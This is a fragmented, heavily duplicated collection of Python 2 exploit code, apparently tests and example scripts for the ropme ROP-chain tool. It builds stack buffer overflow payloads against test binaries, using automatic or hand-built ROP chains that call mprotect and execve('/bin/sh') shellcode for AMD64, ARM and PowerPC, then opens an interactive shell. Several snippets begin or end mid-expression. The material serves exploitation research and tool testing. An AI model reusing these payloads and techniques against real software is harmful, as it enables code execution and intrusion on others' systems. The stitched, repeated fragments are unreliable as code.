def test_bof_syscall(self):
filename = e('bof_syscall')
p = process([filename,'3000'])
buffer_address = int(p.readline().split(":")[1],16)
target_address = buffer_address + 1024
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address)
payload = 'A'*512 + 'B'*8 + rop
payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64()
p.writeline(payload)
self.check_shell(p)
def test_bof_syscall(self):
filename = e('bof_syscall')
p = process([filename, '3000'])
buffer_address = int(p.readline().split(":")[1], 16)
target_address = buffer_address + 1024
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address)
payload = 'A' * 512 + 'B' * 8 + rop
payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64()
p.writeline(payload)
self.check_shell(p)
def test_bof(self):
filename = e('bof')
p = process([filename,'3000'])
line = p.readline()
buffer_address = int(line.split(":")[1],16)
target_address = buffer_address + 1024
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchAMD64(), logging.DEBUG, True)
payload = 'A'*512 + 'B'*8 + rop
payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64()
p.writeline(payload)
self.check_shell(p)
def test_bof(self):
filename = e('bof')
p = process([filename, '3000'])
line = p.readline()
buffer_address = int(line.split(":")[1], 16)
target_address = buffer_address + 1024
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address,
archinfo.ArchAMD64(), logging.DEBUG, True)
payload = 'A' * 512 + 'B' * 8 + rop
payload += ((1024 - len(payload)) * 'B') + self.shellcode_amd64()
p.writeline(payload)
self.check_shell(p)
shellcode = (
"\x01\x30\x8f\xe2" # add r3, pc, #1 ; 0x1
+ "\x13\xff\x2f\xe1" # bx r3 (to the next instruction)
+ "\x78\x46" # mov r0, pc
+ "\x0c\x30" # adds r0, #12
+ "\x01\x90" # str r0, [sp, #4]
+ "\x01\xa9" # add r1, sp, #4
+ "\x92\x1a" # subs r2, r2, r2
+ "\x02\x92" # str r2, [sp, #8]
+ "\x0b\x27" # movs r7, #11
+ "\x01\xdf" # svc 1
+ "//bin/sh" # program to execute
+ "\x00" # NULL to end the string
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address)
print "Using automatically built ROP chain"
rop = ropme.rop_to_shellcode([(filename, None, 0), (libc, libc_gadget_file, libc_address)], [libc], target_address, archinfo.ArchARM(), logging.DEBUG)
payload = 'A'*512 + 'B'*4 + rop
payload += ((700 - len(payload)) * 'B') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()
shellcode = (
"\x01\x30\x8f\xe2" # add r3, pc, #1 ; 0x1
+ "\x13\xff\x2f\xe1" # bx r3 (to the next instruction)
+ "\x78\x46" # mov r0, pc
+ "\x0c\x30" # adds r0, #12
+ "\x01\x90" # str r0, [sp, #4]
+ "\x01\xa9" # add r1, sp, #4
+ "\x92\x1a" # subs r2, r2, r2
+ "\x02\x92" # str r2, [sp, #8]
+ "\x0b\x27" # movs r7, #11
+ "\x01\xdf" # svc 1
+ "//bin/sh" # program to execute
+ "\x00" # NULL to end the string
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address)
print "Using automatically built ROP chain"
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchARM(), logging.DEBUG)
payload = 'A'*512 + 'B'*4 + rop
payload += ((700 - len(payload)) * 'B') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()
if len(sys.argv) < 2: # manual mode
print "Using manually built ROP chain"
POP_RDI = 0x40063f # pop rdi ; ret
POP_RSI = 0x400641 # pop rsi ; ret
POP_RDX = 0x400643 # pop rdx ; ret
POP_RCX = 0x400647 # pop rcx ; ret
POP_R8 = 0x400649 # pop r8 ; ret
POP_R9 = 0x40064c # pop r9 ; ret
MPROTECT = 0x400520
target_page = target_address & ~0xfff
rop = (p64(POP_RDI) + p64(target_page) + p64(POP_RSI) + p64(0x2000) +
p64(POP_RDX) + p64(7) + p64(MPROTECT) + p64(target_address))
else:
print "Using automatically built ROP chain"
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address,
archinfo.ArchAMD64(), logging.DEBUG, True)
payload = 'A' * 512 + 'B' * 8 + rop
payload += ((1024 - len(payload)) * 'B') + shellcode
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
+ "\x0c\x30" # adds r0, #12
+ "\x01\x90" # str r0, [sp, #4]
+ "\x01\xa9" # add r1, sp, #4
+ "\x92\x1a" # subs r2, r2, r2
+ "\x02\x92" # str r2, [sp, #8]
+ "\x0b\x27" # movs r7, #11
+ "\x01\xdf" # svc 1
+ "//bin/sh" # program to execute
+ "\x00" # NULL to end the string
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode),
target_address)
print "Using automatically built ROP chain"
rop = ropme.rop_to_shellcode([(filename, None, 0),
(libc, libc_gadget_file, libc_address)], [libc],
target_address, archinfo.ArchARM(), logging.DEBUG)
payload = 'A' * 512 + 'B' * 4 + rop
payload += ((700 - len(payload)) * 'B') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
shellcode = ( # http://shell-storm.org/shellcode/files/shellcode-603.php
"\x48\x31\xd2" # xor %rdx, %rdx
+ "\x48\x31\xc0" # xor %rax, %rax
+
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov $0x68732f6e69622f2f, %rbx
+ "\x48\xc1\xeb\x08" # shr $0x8, %rbx
+ "\x53" # push %rbx
+ "\x48\x89\xe7" # mov %rsp, %rdi
+ "\x50" # push %rax
+ "\x57" # push %rdi
+ "\x48\x89\xe6" # mov %rsp, %rsi
+ "\xb0\x3b" # mov $0x3b, %al
+ "\x0f\x05" # syscall
)
target_address = buffer_address + 1024
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode),
target_address)
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address)
payload = 'A' * 512 + 'B' * 8 + rop
payload += ((1024 - len(payload)) * 'B') + shellcode
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)
p.interactive()
"\x7f\x08\x02\xa6" + # mflr r24
"\x3b\x18\x01\x34" + # addi r24,r24,308
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
"\x38\x78\xfe\xf4" + # addi r3,r24,-268
"\x90\x61\xff\xf8" + # stw r3,-8(r1)
"\x38\x81\xff\xf8" + # addi r4,r1,-8
"\x90\xa1\xff\xfc" + # stw r5,-4(r1)
"\x3b\xc0\x01\x60" + # li r30,352
"\x7f\xc0\x2e\x70" + # srawi r0,r30,5
"\x44\x00\x00\x02" + # sc
"/bin/shZ" # the last byte becomes NULL
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode), target_address)
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address, archinfo.ArchPPC32('Iend_BE'), logging.DEBUG)
payload = 'A'*512 + 'B'*0x1c
# We need some custom gadgets to fixup the stack because of the PPC function saving the lr above the current stack frame
payload += struct.pack(">i", 0x10000670) + "C" * 12 + struct.pack(">i", 0x1000066c) + "D"*4 # how annoying
payload += rop
payload += ((700 - len(payload)) * 'E') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()
"\x3b\x18\x01\x34" + # addi r24,r24,308
"\x98\xb8\xfe\xfb" + # stb r5,-261(r24)
"\x38\x78\xfe\xf4" + # addi r3,r24,-268
"\x90\x61\xff\xf8" + # stw r3,-8(r1)
"\x38\x81\xff\xf8" + # addi r4,r1,-8
"\x90\xa1\xff\xfc" + # stw r5,-4(r1)
"\x3b\xc0\x01\x60" + # li r30,352
"\x7f\xc0\x2e\x70" + # srawi r0,r30,5
"\x44\x00\x00\x02" + # sc
"/bin/shZ" # the last byte becomes NULL
)
target_address = buffer_address + 700
print "shellcode ({} bytes) address: 0x{:x}".format(len(shellcode),
target_address)
rop = ropme.rop_to_shellcode([(filename, None, 0)], [], target_address,
archinfo.ArchPPC32('Iend_BE'), logging.DEBUG)
payload = 'A' * 512 + 'B' * 0x1c
# We need some custom gadgets to fixup the stack because of the PPC function saving the lr above the current stack frame
payload += struct.pack(">i", 0x10000670) + "C" * 12 + struct.pack(
">i", 0x1000066c) + "D" * 4 # how annoying
payload += rop
payload += ((700 - len(payload)) * 'E') + shellcode
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f:
f.write(rop)
with open("/tmp/payload", "w") as f:
f.write(payload)
p.writeline(payload)